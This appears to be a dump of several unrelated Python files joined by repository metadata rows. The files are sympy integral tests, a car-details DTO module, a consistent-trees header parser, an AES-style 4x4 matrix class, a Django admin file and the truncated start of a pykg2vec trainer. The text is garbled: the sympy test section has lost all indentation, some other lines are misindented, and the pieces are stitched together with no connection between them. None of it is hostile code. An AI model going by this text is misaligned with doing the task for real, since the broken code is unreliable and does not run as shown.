conv = Integral(f(x - y)*f(y), (y, -oo, oo), (t, x, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs4():
e = Integral(exp(x), (x, 0, y), (t, y, 1))
assert e.subs(y, 3) == Integral(exp(x), (x, 0, 3), (t, 3, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(y)*f(y), (y, -oo, oo), (t, x, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs5():
e = Integral(exp(-x**2), (x, -oo, oo))
assert e.subs(x, 5) == e
e = Integral(exp(-x**2 + y), x)
assert e.subs(y, 5) == Integral(exp(-x**2 + 5), x)
e = Integral(exp(-x**2 + y), (x, x))
assert e.subs(x, 5) == Integral(exp(y - x**2), (x, 5))
assert e.subs(y, 5) == Integral(exp(-x**2 + 5), x)
e = Integral(exp(-x**2 + y), (y, -oo, oo), (x, -oo, oo))
assert e.subs(x, 5) == e
assert e.subs(y, 5) == e
# Test evaluation of antiderivatives
e = Integral(exp(-x**2), (x, x))
assert e.subs(x, 5) == Integral(exp(-x**2), (x, 5))
e = Integral(exp(x), x)
assert (e.subs(x,1)-e.subs(x,0) - Integral(exp(x),(x,0,1))).doit().is_zero
def test_subs6():
a, b = symbols('a b')
e = Integral(x*y, (x, f(x), f(y)))
assert e.subs(x, 1) == Integral(x*y, (x, f(1), f(y)))
assert e.subs(y, 1) == Integral(x, (x, f(x), f(1)))
e = Integral(x*y, (x, f(x), f(y)), (y, f(x), f(y)))
assert e.subs(x, 1) == Integral(x*y, (x, f(1), f(y)), (y, f(1), f(y)))
assert e.subs(y, 1) == Integral(x*y, (x, f(x), f(y)), (y, f(x), f(1)))
e = Integral(x*y, (x, f(x), f(a)), (y, f(x), f(a)))
assert e.subs(a, 1) == Integral(x*y, (x, f(x), f(1)), (y, f(x), f(1)))
def test_subs7():
e = Integral(x, (x, 1, y), (y, 1, 2))
assert e.subs({x: 1, y: 2}) == e
e = Integral(sin(x) + sin(y), (x, sin(x), sin(y)),
(y, 1, 2))
assert e.subs(sin(y), 1) == e
assert e.subs(sin(x), 1) == Integral(sin(x) + sin(y), (x, 1, sin(y)),
(y, 1, 2))
def test_expand():
e = Integral(f(x)+f(x**2), (x, 1, y))
assert e.expand() == Integral(f(x), (x, 1, y)) + Integral(f(x**2), (x, 1, y))
def test_integration_variable():
raises(ValueError, lambda: Integral(exp(-x**2), 3))
raises(ValueError, lambda: Integral(exp(-x**2), (3, -oo, oo)))
def test_expand_integral():
assert Integral(cos(x**2)*(sin(x**2) + 1), (x, 0, 1)).expand() == \
Integral(cos(x**2)*sin(x**2), (x, 0, 1)) + \
Integral(cos(x**2), (x, 0, 1))
assert Integral(cos(x**2)*(sin(x**2) + 1), x).expand() == \
Integral(cos(x**2)*sin(x**2), x) + \
Integral(cos(x**2), x)
def test_as_sum_midpoint1():
e = Integral(sqrt(x**3 + 1), (x, 2, 10))
assert e.as_sum(1, method="midpoint") == 8*sqrt(217)
assert e.as_sum(2, method="midpoint") == 4*sqrt(65) + 12*sqrt(57)
assert e.as_sum(3, method="midpoint") == 8*sqrt(217)/3 + \
8*sqrt(3081)/27 + 8*sqrt(52809)/27
assert e.as_sum(4, method="midpoint") == 2*sqrt(730) + \
4*sqrt(7) + 4*sqrt(86) + 6*sqrt(14)
assert abs(e.as_sum(4, method="midpoint").n() - e.n()) < 0.5
e = Integral(sqrt(x**3 + y**3), (x, 2, 10), (y, 0, 10))
raises(NotImplementedError, lambda: e.as_sum(4))
def test_as_sum_midpoint2():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="midpoint").expand() == S(1)/4 + y + y**2
assert e.as_sum(2, method="midpoint").expand() == S(5)/16 + y + y**2
assert e.as_sum(3, method="midpoint").expand() == S(35)/108 + y + y**2
assert e.as_sum(4, method="midpoint").expand() == S(21)/64 + y + y**2
def test_as_sum_left():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="left").expand() == y**2
assert e.as_sum(2, method="left").expand() == S(1)/8 + y/2 + y**2
assert e.as_sum(3, method="left").expand() == S(5)/27 + 2*y/3 + y**2
assert e.as_sum(4, method="left").expand() == S(7)/32 + 3*y/4 + y**2
def test_as_sum_right():
e = Integral((x + y)**2, (x, 0, 1))
assert e.as_sum(1, method="right").expand() == 1 + 2*y + y**2
assert e.as_sum(2, method="right").expand() == S(5)/8 + 3*y/2 + y**2
assert e.as_sum(3, method="right").expand() == S(14)/27 + 4*y/3 + y**2
assert e.as_sum(4, method="right").expand() == S(15)/32 + 5*y/4 + y**2
def test_as_sum_raises():
e = Integral((x + y)**2, (x, 0, 1))
raises(ValueError, lambda: e.as_sum(-1))
raises(ValueError, lambda: e.as_sum(0))
raises(ValueError, lambda: Integral(x).as_sum(3))
raises(NotImplementedError, lambda: e.as_sum(oo))
raises(NotImplementedError, lambda: e.as_sum(3, method='xxxx2'))
def test_nested_doit():
e = Integral(Integral(x, x), x)
f = Integral(x, x, x)
assert e.doit() == f.doit()
def test_issue_4665():
# Allow only upper or lower limit evaluation
e = Integral(x**2, (x, None, 1))
f = Integral(x**2, (x, 1, None))
assert e.doit() == Rational(1, 3)
assert f.doit() == Rational(-1, 3)
assert Integral(x*y, (x, None, y)).subs(y, t) == Integral(x*t, (x, None, t))
assert Integral(x*y, (x, y, None)).subs(y, t) == Integral(x*t, (x, t, None))
assert integrate(x**2, (x, None, 1)) == Rational(1, 3)
assert integrate(x**2, (x, 1, None)) == Rational(-1, 3)
assert integrate("x**2", ("x", "1", None)) == Rational(-1, 3)
def test_integral_reconstruct():
e = Integral(x**2, (x, -1, 1))
assert e == Integral(*e.args)
def test_doit():
e = Integral(Integral(2*x), (x, 0, 1))
assert e.doit() == Rational(1, 3)
assert e.doit(deep=False) == Rational(1, 3)
f = Function('f')
# doesn't matter if the integral can't be performed
assert Integral(f(x), (x, 1, 1)).doit() == 0
# doesn't matter if the limits can't be evaluated
assert Integral(0, (x, 1, Integral(f(x), x))).doit() == 0
def test_issue_4884():
assert integrate(sqrt(x)*(1 + x)) == \
Piecewise(
(2*sqrt(x)*(x + 1)**2/5 - 2*sqrt(x)*(x + 1)/15 - 4*sqrt(x)/15,
Abs(x + 1) > 1),
(2*I*sqrt(-x)*(x + 1)**2/5 - 2*I*sqrt(-x)*(x + 1)/15 -
4*I*sqrt(-x)/15, True))
assert integrate(x**x*(1 + log(x))) == x**x
def test_is_number():
from sympy.abc import x, y, z
from sympy import cos, sin
assert Integral(x).is_number is False
assert Integral(1, x).is_number is False
assert Integral(1, (x, 1)).is_number is True
assert Integral(1, (x, 1, 2)).is_number is True
assert Integral(1, (x, 1, y)).is_number is False
assert Integral(x, y).is_number is False
assert Integral(x, (y, 1, x)).is_number is False
assert Integral(x, (y, 1, 2)).is_number is False
assert Integral(x, (x, 1, 2)).is_number is True
assert Integral(x, (y, 1, 1)).is_number is True
assert Integral(x*y, (x, 1, 2), (y, 1, 3)).is_number is True
assert Integral(x*y, (x, 1, 2), (y, 1, z)).is_number is False
assert Integral(x, (x, 1)).is_number is True
assert Integral(x, (x, 1, Integral(y, (y, 1, 2)))).is_number is True
# it is possible to get a false negative if the integrand is
# actually an unsimplified zero, but this is true of is_number in general.
assert Integral(sin(x)**2 + cos(x)**2 - 1, x).is_number is False
def test_symbols():
from sympy.abc import x, y, z
assert Integral(0, x).free_symbols == set()
assert Integral(x).free_symbols == set([x])
assert Integral(x, (x, None, y)).free_symbols == set([y])
assert Integral(x, (x, y, None)).free_symbols == set([y])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert Integral(x, (x, y, 1)).free_symbols == set([y])
assert Integral(x, (x, x, y)).free_symbols == set([x, y])
assert Integral(x, x, y).free_symbols == set([x, y])
assert Integral(x, (x, 1, 2)).free_symbols == set()
assert Integral(x, (y, 1, 2)).free_symbols == set([x])
assert Integral(x, (y, z, z)).free_symbols == set()
assert Integral(x, (y, 1, 2), (y, None, None)).free_symbols == set([x, y])
assert Integral(x, (y, 1, 2), (x, 1, y)).free_symbols == set([y])
assert Integral(2, (y, 1, 2), (y, 1, x), (x, 1, 2)).free_symbols == set()
assert Integral(2, (y, x, 2), (y, 1, x), (x, 1, 2)).free_symbols == set()
assert Integral(2, (x, 1, 2), (y, x, 2), (y, 1, 2)).free_symbols == \
set([x])
def test_is_zero():
from sympy.abc import x, m, n
assert Integral(0, (x, 1, x)).is_zero
assert Integral(1, (x, 1, 1)).is_zero
assert Integral(1, (x, 1, 2)).is_zero is False
assert Integral(sin(m*x)*cos(n*x), (x, 0, 2*pi)).is_zero is None
def test_series():
from sympy.abc import x
i = Integral(cos(x), (x, x))
e = i.lseries(x)
assert i.nseries(x, n=8).removeO() == Add(*[next(e) for j in range(4)])
def test_issue_4403():
x = Symbol('x')
y = Symbol('y')
z = Symbol('z', positive=True)
assert integrate(sqrt(x**2 + z**2), x) == \
z**2*asinh(x/z)/2 + x*sqrt(x**2 + z**2)/2
assert integrate(sqrt(x**2 - z**2), x) == \
-z**2*acosh(x/z)/2 + x*sqrt(x**2 - z**2)/2
x = Symbol('x', real=True)
y = Symbol('y', nonzero=True, real=True)
assert integrate(1/(x**2 + y**2)**S('3/2'), x) == \
1/(y**2*sqrt(1 + y**2/x**2))
def test_issue_4403_2():
assert integrate(sqrt(-x**2 - 4), x) == \
-2*atan(x/sqrt(-4 - x**2)) + x*sqrt(-4 - x**2)/2
def test_issue_4100():
R = Symbol('R', positive=True)
assert integrate(sqrt(R**2 - x**2), (x, 0, R)) == pi*R**2/4
def test_issue_5167():
from sympy.abc import w, x, y, z
f = Function('f')
assert Integral(Integral(f(x), x), x) == Integral(f(x), x, x)
assert Integral(f(x)).args == (f(x), Tuple(x))
assert Integral(Integral(f(x))).args == (f(x), Tuple(x), Tuple(x))
assert Integral(Integral(f(x)), y).args == (f(x), Tuple(x), Tuple(y))
assert Integral(Integral(f(x), z), y).args == (f(x), Tuple(z), Tuple(y))
assert Integral(Integral(Integral(f(x), x), y), z).args == \
(f(x), Tuple(x), Tuple(y), Tuple(z))
assert integrate(Integral(f(x), x), x) == Integral(f(x), x, x)
assert integrate(Integral(f(x), y), x) == Integral(y*f(x), x)
assert integrate(Integral(f(x), x), y) == Integral(y*f(x), x)
assert integrate(Integral(2, x), x) == x**2
assert integrate(Integral(2, x), y) == 2*x*y
# don't re-order given limits
assert Integral(1, x, y).args != Integral(1, y, x).args
    # do as many as possible
assert Integral(f(x), y, x, y, x).doit() == Integral(y**2*f(x)/2, x, x)
assert Integral(f(x), (x, 1, 2), (w, 1, x), (z, 1, y)).doit() == \
Integral(-f(x) + y*f(x), (x, 1, 2), (w, 1, x))
def test_issue_4890():
z = Symbol('z', positive=True)
assert integrate(exp(-log(x)**2), x) == \
sqrt(pi)*exp(S(1)/4)*erf(log(x)-S(1)/2)/2
assert integrate(exp(log(x)**2), x) == \
sqrt(pi)*exp(-S(1)/4)*erfi(log(x)+S(1)/2)/2
assert integrate(exp(-z*log(x)**2), x) == \
sqrt(pi)*exp(1/(4*z))*erf(sqrt(z)*log(x) - 1/(2*sqrt(z)))/(2*sqrt(z))
def test_issue_4376():
n = Symbol('n', integer=True, positive=True)
assert simplify(integrate(n*(x**(1/n) - 1), (x, 0, S.Half)) -
(n**2 - 2**(1/n)*n**2 - n*2**(1/n))/(2**(1 + 1/n) + n*2**(1 + 1/n))) == 0
@slow
def test_issue_4517():
assert integrate((sqrt(x) - x**3)/x**Rational(1, 3), x) == \
6*x**Rational(7, 6)/7 - 3*x**Rational(11, 3)/11
def test_issue_4527():
k, m = symbols('k m', integer=True)
assert integrate(sin(k*x)*sin(m*x), (x, 0, pi)) == Piecewise(
(0, And(Eq(k, 0), Eq(m, 0))),
(-pi/2, Eq(k, -m)),
(pi/2, Eq(k, m)),
(0, True))
assert integrate(sin(k*x)*sin(m*x), (x,)) == Piecewise(
(0, And(Eq(k, 0), Eq(m, 0))),
(-x*sin(m*x)**2/2 - x*cos(m*x)**2/2 + sin(m*x)*cos(m*x)/(2*m), Eq(k, -m)),
(x*sin(m*x)**2/2 + x*cos(m*x)**2/2 - sin(m*x)*cos(m*x)/(2*m), Eq(k, m)),
(m*sin(k*x)*cos(m*x)/(k**2 - m**2) -
k*sin(m*x)*cos(k*x)/(k**2 - m**2), True))
def test_issue_4199():
ypos = Symbol('y', positive=True)
# TODO: Remove conds='none' below, let the assumption take care of it.
assert integrate(exp(-I*2*pi*ypos*x)*x, (x, -oo, oo), conds='none') == \
Integral(exp(-I*2*pi*ypos*x)*x, (x, -oo, oo))
def test_issue_3940():
a, b, c, d = symbols('a:d', positive=True, bounded=True)
assert integrate(exp(-x**2 + I*c*x), x) == \
-sqrt(pi)*exp(-c**2/4)*erf(I*c/2 - x)/2
assert integrate(exp(a*x**2 + b*x + c), x) == \
sqrt(pi)*exp(c)*exp(-b**2/(4*a))*erfi(sqrt(a)*x + b/(2*sqrt(a)))/(2*sqrt(a))
from sympy import expand_mul
from sympy.abc import k
assert expand_mul(integrate(exp(-x**2)*exp(I*k*x), (x, -oo, oo))) == \
sqrt(pi)*exp(-k**2/4)
a, d = symbols('a d', positive=True)
assert expand_mul(integrate(exp(-a*x**2 + 2*d*x), (x, -oo, oo))) == \
sqrt(pi)*exp(d**2/a)/sqrt(a)
def test_issue_5413():
    # Note that this is not the same as testing ratint() because integrate()
# pulls out the coefficient.
assert integrate(-a/(a**2 + x**2), x) == I*log(-I*a + x)/2 - I*log(I*a + x)/2
def test_issue_4892a():
A, z = symbols('A z')
c = Symbol('c', nonzero=True)
P1 = -A*exp(-z)
P2 = -A/(c*t)*(sin(x)**2 + cos(y)**2)
h1 = -sin(x)**2 - cos(y)**2
h2 = -sin(x)**2 + sin(y)**2 - 1
# there is still some non-deterministic behavior in integrate
# or trigsimp which permits one of the following
assert integrate(c*(P2 - P1), t) in [
c*(-A*(-h1)*log(c*t)/c + A*t*exp(-z)),
c*(-A*(-h2)*log(c*t)/c + A*t*exp(-z)),
c*( A* h1 *log(c*t)/c + A*t*exp(-z)),
c*( A* h2 *log(c*t)/c + A*t*exp(-z)),
(A*c*t - A*(-h1)*log(t)*exp(z))*exp(-z),
(A*c*t - A*(-h2)*log(t)*exp(z))*exp(-z),
]
def test_issue_4892b():
# Issues relating to issue 4596 are making the actual result of this hard
# to test. The answer should be something like
#
# (-sin(y) + sqrt(-72 + 48*cos(y) - 8*cos(y)**2)/2)*log(x + sqrt(-72 +
# 48*cos(y) - 8*cos(y)**2)/(2*(3 - cos(y)))) + (-sin(y) - sqrt(-72 +
# 48*cos(y) - 8*cos(y)**2)/2)*log(x - sqrt(-72 + 48*cos(y) -
# 8*cos(y)**2)/(2*(3 - cos(y)))) + x**2*sin(y)/2 + 2*x*cos(y)
expr = (sin(y)*x**3 + 2*cos(y)*x**2 + 12)/(x**2 + 2)
assert trigsimp(factor(integrate(expr, x).diff(x) - expr)) == 0
def test_issue_5178():
assert integrate(sin(x)*f(y, z), (x, 0, pi), (y, 0, pi), (z, 0, pi)) == \
Integral(2*f(y, z), (y, 0, pi), (z, 0, pi))
def test_integrate_series():
f = sin(x).series(x, 0, 10)
g = x**2/2 - x**4/24 + x**6/720 - x**8/40320 + x**10/3628800 + O(x**11)
assert integrate(f, x) == g
assert diff(integrate(f, x), x) == f
assert integrate(O(x**5), x) == O(x**6)
def test_atom_bug():
from sympy import meijerg
from sympy.integrals.heurisch import heurisch
assert heurisch(meijerg([], [], [1], [], x), x) is None
def test_limit_bug():
z = Symbol('z', nonzero=True)
assert integrate(sin(x*y*z), (x, 0, pi), (y, 0, pi)) == \
(log(z**2) + 2*EulerGamma + 2*log(pi))/(2*z) - \
(-log(pi*z) + log(pi**2*z**2)/2 + Ci(pi**2*z))/z + log(pi)/z
def test_issue_4703():
g = Function('g')
assert integrate(exp(x)*g(x), x).has(Integral)
def test_issue_1888():
f = Function('f')
assert integrate(f(x).diff(x)**2, x).has(Integral)
# The following tests work using meijerint.
def test_issue_3558():
from sympy import Si
assert integrate(cos(x*y), (x, -pi/2, pi/2), (y, 0, pi)) == 2*Si(pi**2/2)
def test_issue_4422():
assert integrate(1/sqrt(16 + 4*x**2), x) == asinh(x/2) / 2
def test_issue_4493():
from sympy import simplify
assert simplify(integrate(x*sqrt(1 + 2*x), x)) == \
sqrt(2*x + 1)*(6*x**2 + x - 1)/15
def test_issue_4737():
assert integrate(sin(x)/x, (x, -oo, oo)) == pi
assert integrate(sin(x)/x, (x, 0, oo)) == pi/2
def test_issue_4992():
from sympy import simplify, expand_func, polygamma, gamma
a = Symbol('a', positive=True)
assert simplify(expand_func(integrate(exp(-x)*log(x)*x**a, (x, 0, oo)))) == \
(a*polygamma(0, a) + 1)*gamma(a)
def test_issue_4487():
from sympy import lowergamma, simplify
assert simplify(integrate(exp(-x)*x**y, x)) == lowergamma(y + 1, x)
@XFAIL
def test_issue_4215():
x = Symbol("x")
assert integrate(1/(x**2), (x, -1, 1)) == oo
def test_issue_4400():
n = Symbol('n', integer=True, positive=True)
assert integrate((x**n)*log(x), x) == \
n*x*x**n*log(x)/(n**2 + 2*n + 1) + x*x**n*log(x)/(n**2 + 2*n + 1) - \
x*x**n/(n**2 + 2*n + 1)
def test_issue_6253():
# Note: this used to raise NotImplementedError
assert integrate((sqrt(1 - x) + sqrt(1 + x))**2/x, x, meijerg=True) == \
Integral((sqrt(-x + 1) + sqrt(x + 1))**2/x, x)
def test_issue_4153():
assert integrate(1/(1 + x + y + z), (x, 0, 1), (y, 0, 1), (z, 0, 1)) in [
-12*log(3) - 3*log(6)/2 + 3*log(8)/2 + 5*log(2) + 7*log(4),
6*log(2) + 8*log(4) - 27*log(3)/2, 22*log(2) - 27*log(3)/2,
-12*log(3) - 3*log(6)/2 + 47*log(2)/2]
def test_issue_4326():
R, b, h = symbols('R b h')
# It doesn't matter if we can do the integral. Just make sure the result
# doesn't contain nan. This is really a test against _eval_interval.
assert not integrate(((h*(x - R + b))/b)*sqrt(R**2 - x**2), (x, R - b, R)).has(nan)
def test_powers():
assert integrate(2**x + 3**x, x) == 2**x/log(2) + 3**x/log(3)
def test_risch_option():
# risch=True only allowed on indefinite integrals
raises(ValueError, lambda: integrate(1/log(x), (x, 0, oo), risch=True))
assert integrate(exp(-x**2), x, risch=True) == NonElementaryIntegral(exp(-x**2), x)
assert integrate(log(1/x)*y, x, y, risch=True) == y**2*(x*log(1/x)/2 + x/2)
assert integrate(erf(x), x, risch=True) == Integral(erf(x), x)
# TODO: How to test risch=False?
def test_issue_6828():
# TODO: Currently `h' is the result (all three are equivalent). Improve
# simplify() to find the form with simplest real coefficients.
f = 1/(1.08*x**2 - 4.3)
g = 300.0/(324.0*x**2 - 1290.0)
h = 0.925925925925926/(1.0*x**2 - 3.98148148148148)
assert integrate(f, x).diff(x).simplify().equals(f) is True
@XFAIL
def test_integrate_Piecewise_rational_over_reals():
f = Piecewise(
(0, t - 478.515625*pi < 0),
(13.2075145209219*pi/(0.000871222*t + 0.995)**2, t - 478.515625*pi >= 0))
assert integrate(f, (t, 0, oo)) == 15235.9375*pi
def test_issue_4803():
x_max = Symbol("x_max")
assert integrate(y/pi*exp(-(x_max - x)/cos(a)), x) == \
y*exp((x - x_max)/cos(a))*cos(a)/pi
def test_issue_4234():
assert integrate(1/sqrt(1 + tan(x)**2)) == tan(x) / sqrt(1 + tan(x)**2)
def test_issue_4492():
assert simplify(integrate(x**2 * sqrt(5 - x**2), x)) == Piecewise(
(I*(2*x**5 - 15*x**3 + 25*x - 25*sqrt(x**2 - 5)*acosh(sqrt(5)*x/5)) /
(8*sqrt(x**2 - 5)), Abs(x**2)/5 > 1),
((-2*x**5 + 15*x**3 - 25*x + 25*sqrt(-x**2 + 5)*asin(sqrt(5)*x/5)) /
(8*sqrt(-x**2 + 5)), True))
| 36.589567 | 89 | 0.54195 |
207bf94fb379346d0bce08acc3c5d849b81ba575 | 1,049 | py | Python | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | services/classes.py | TimurBaldin/FinesWebParser | 4b0155e21f054efcfde173c01f636a634f16298b | [
"Apache-2.0"
] | null | null | null | from pydantic.main import BaseModel
from enum import Enum
class CarDetailsDto:
def __init__(self, reg_num, reg_reg, sts_num, count=3):
self.reg_num = reg_num
self.reg_reg = reg_reg
self.sts_num = sts_num
self.__count = count
self.__active = True
self.__msg = None
        self.__id = None
def get_count(self):
return self.__count
def decrement(self):
self.__count = self.__count - 1
def get_active_status(self):
return self.__active
def set_active_status(self, new_status):
self.__active = new_status
def set_img_data(self, msg):
self.__msg = msg
def get_img_data(self):
return self.__msg
    def set_id(self, id):
        self.__id = id
def get_id(self):
return self.__id
def __repr__(self):
return str(self.__dict__)
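# Minimal usage sketch for CarDetailsDto; all field values below are
# hypothetical:
#
#   car = CarDetailsDto(reg_num="A123BC", reg_reg="77", sts_num="1234567890")
#   car.decrement()                      # one parsing attempt consumed
#   if car.get_count() == 0:
#       car.set_active_status(False)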
class Settings(BaseModel):
useLocalDriver = False
countOfProcess = 1
timeout = 15
class BrowserType(Enum):
FIREFOX = "FIREFOX"
SELENOID = "SELENOID"
| 19.072727 | 59 | 0.630124 |
e2eb5c2b25874519a738eddcdcddd0266ad568cd | 4,483 | py | Python | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 3 | 2020-02-28T10:25:39.000Z | 2021-04-13T07:18:35.000Z | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 36 | 2019-12-03T17:33:29.000Z | 2022-02-18T10:39:25.000Z | ytree/frontends/consistent_trees/utilities.py | ytree-project/ytree | 4ba1d3e6efd1e647c594b2c0de51b0217de7a45c | [
"BSD-3-Clause-Clear"
] | 6 | 2019-08-22T16:01:34.000Z | 2020-08-25T09:57:17.000Z | """
ConsistentTreesArbor utility functions
"""
#-----------------------------------------------------------------------------
# Copyright (c) ytree development team. All rights reserved.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
import re
from unyt.exceptions import \
UnitParseError
def parse_ctrees_header(arbor, input_stream,
ntrees_in_file=True):
"""
Parse consistent-trees header information.
Parse ascii text from a file or list of strings to get:
- cosmology parameters
- box size
- fields and units
- optionally, number of trees and end of header file offset
Return a dictionary of field information.
"""
fields = []
fi = {}
fdb = {}
rems = [f"{s[0]}{t}{s[1]}"
for s in [("(", ")"), ("", "")]
for t in ["physical, peculiar",
"comoving", "physical"]]
if isinstance(input_stream, str):
f = open(input_stream, mode='r')
is_file = True
else:
is_file = False
def next_line():
if is_file:
return f.readline()
else:
return input_stream.pop(0) \
if input_stream else None
# Read the first line as a list of all fields.
    # Do some footwork to remove awkward characters.
rfl = next_line()[1:].strip().split()
reg = re.compile(r"\(\d+\)$")
for pf in rfl:
match = reg.search(pf)
if match is None:
fields.append(pf)
else:
fields.append(pf[:match.start()])
# Now grab a bunch of things from the header.
while True:
line = next_line()
if line is None:
if ntrees_in_file:
raise IOError(
f"Encountered enexpected EOF reading {input_stream}.")
else:
break
elif not line.startswith("#"):
if ntrees_in_file:
arbor._size = int(line.strip())
arbor._hoffset = f.tell()
break
# cosmological parameters
if "Omega_M" in line:
pars = line[1:].split(";")
for j, par in enumerate(["omega_matter",
"omega_lambda",
"hubble_constant"]):
v = float(pars[j].split(" = ")[1])
setattr(arbor, par, v)
# box size
elif "Full box size" in line:
pars = line.split("=")[1].strip().split()
box = pars
# These are lines describing the various fields.
# Pull them apart and look for units.
elif ":" in line:
tfields, desc = line[1:].strip().split(":", 1)
# Units are enclosed in parentheses.
# Pull out what's enclosed and remove things like
# "comoving" and "physical".
if "(" in line and ")" in line:
punits = desc[desc.find("(")+1:desc.rfind(")")]
for rem in rems:
while rem in punits:
pre, mid, pos = punits.partition(rem)
punits = pre + pos
try:
arbor.quan(1, punits)
except UnitParseError:
punits = ""
else:
punits = ""
# Multiple fields together on the same line.
for sep in ["/", ","]:
if sep in tfields:
tfields = tfields.split(sep)
break
if not isinstance(tfields, list):
tfields = [tfields]
# Assign units and description.
for tfield in tfields:
fdb[tfield.lower()] = {"description": desc.strip(),
"units": punits}
if is_file:
f.close()
# Fill the field info with the units found above.
for i, field in enumerate(fields):
if "(" in field and ")" in field:
cfield = field[:field.find("(")]
else:
cfield = field
fi[field] = fdb.get(cfield.lower(),
{"description": "",
"units": ""})
fi[field]["column"] = i
arbor.box_size = arbor.quan(float(box[0]), box[1])
return fi
| 30.917241 | 78 | 0.478028 |
4f3879a175716957860a50a932e7b7354f79bbe1 | 893 | py | Python | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | 1 | 2021-12-20T06:57:09.000Z | 2021-12-20T06:57:09.000Z | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | null | null | null | aesjosephus/matrix.py | WingedSeal/AES_Josephus | 7868fc798cce6b297c7cfd3c2f251276dd2323ac | [
"MIT"
] | null | null | null | import numpy as np
class Matrix:
@property
def array(self):
return self._state
    def __init__(self, state: np.ndarray) -> None:
        if state.shape != (4, 4):
            raise ValueError(f"State needs to be a 4x4 matrix. ({state.shape} shape was given)")
        self._state = state.astype("uint8")
def __repr__(self) -> str:
return f"{self.__class__.__name__}(array=\n{np.array2string(self._state, separator=', ')})"
def __str__(self) -> str:
array = self._state
return f"""
| {array[0,0]:02x} {array[0,1]:02x} {array[0,2]:02x} {array[0,3]:02x} |
| {array[1,0]:02x} {array[1,1]:02x} {array[1,2]:02x} {array[1,3]:02x} |
| {array[2,0]:02x} {array[2,1]:02x} {array[2,2]:02x} {array[2,3]:02x} |
| {array[3,0]:02x} {array[3,1]:02x} {array[3,2]:02x} {array[3,3]:02x} |
"""
| 34.346154 | 99 | 0.56103 |
06bc176563f0a9b515db9b4c44cfbeb1c397d3cd | 167 | py | Python | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | clubes/admin.py | JohnVictor2017/StartTm | 91a6f60ffd36f25f01d75798c5ef83e7dc44d97d | [
"MIT"
] | null | null | null | from django.contrib import admin
from clubes.models import Clube,AtletaClube
# Register your models here.
admin.site.register(Clube)
admin.site.register(AtletaClube) | 23.857143 | 43 | 0.826347 |
b8f5fb402359202d43256afb75e45a5f8443d27f | 20,873 | py | Python | pykg2vec/utils/trainer.py | baxtree/pykg2vec | 59498ed5aae7cbe44f881b2c807fb02f1b53999d | [
"MIT"
] | 1 | 2020-10-11T21:52:51.000Z | 2020-10-11T21:52:51.000Z | pykg2vec/utils/trainer.py | KonstantinKlepikov/pykg2vec | 658b70a54a371f79252550b0cad7e19578198505 | [
"MIT"
] | null | null | null | pykg2vec/utils/trainer.py | KonstantinKlepikov/pykg2vec | 658b70a54a371f79252550b0cad7e19578198505 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import warnings
import torch
import numpy as np
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
import pandas as pd
from tqdm import tqdm
from pathlib import Path
from pykg2vec.utils.evaluator import Evaluator
from pykg2vec.utils.visualization import Visualization
from pykg2vec.data.generator import Generator
from pykg2vec.utils.logger import Logger
from pykg2vec.common import Monitor, TrainingStrategy
warnings.filterwarnings('ignore')
class EarlyStopper:
""" Class used by trainer for handling the early stopping mechanism during the training of KGE algorithms.
Args:
patience (int): Number of epochs to wait before early stopping the training on no improvement.
No early stopping if it is a negative number (default: {-1}).
monitor (Monitor): the type of metric that earlystopper will monitor.
"""
_logger = Logger().get_logger(__name__)
def __init__(self, patience, monitor):
self.monitor = monitor
self.patience = patience
# controlling variables.
self.previous_metrics = None
self.patience_left = patience
def should_stop(self, curr_metrics):
should_stop = False
value, name = self.monitor.value, self.monitor.name
if self.previous_metrics is not None:
if self.monitor == Monitor.MEAN_RANK or self.monitor == Monitor.FILTERED_MEAN_RANK:
is_worse = self.previous_metrics[value] < curr_metrics[value]
else:
is_worse = self.previous_metrics[value] > curr_metrics[value]
if self.patience_left > 0 and is_worse:
self.patience_left -= 1
self._logger.info(
'%s more chances before the trainer stops the training. (prev_%s, curr_%s): (%.4f, %.4f)' %
(self.patience_left, name, name, self.previous_metrics[value], curr_metrics[value]))
elif self.patience_left == 0 and is_worse:
self._logger.info('Stop the training.')
should_stop = True
else:
self._logger.info('Reset the patience count to %d' % (self.patience))
self.patience_left = self.patience
self.previous_metrics = curr_metrics
return should_stop
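# Minimal sketch of how EarlyStopper is driven by a training loop; the patience
# value is illustrative and `metrics` is the dict returned by the evaluator's
# mini_test, as in Trainer.train_model below:
#
#   stopper = EarlyStopper(patience=3, monitor=Monitor.FILTERED_MEAN_RANK)
#   for epoch in range(epochs):
#       ...  # one training epoch
#       metrics = evaluator.mini_test(epoch)
#       if stopper.should_stop(metrics):
#           break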
class Trainer:
""" Class for handling the training of the algorithms.
        Args:
            model (object): KGE model object
            config (object): Config object holding the hyper-parameters
        Examples:
            >>> from pykg2vec.utils.trainer import Trainer
            >>> from pykg2vec.models.TransE import TransE
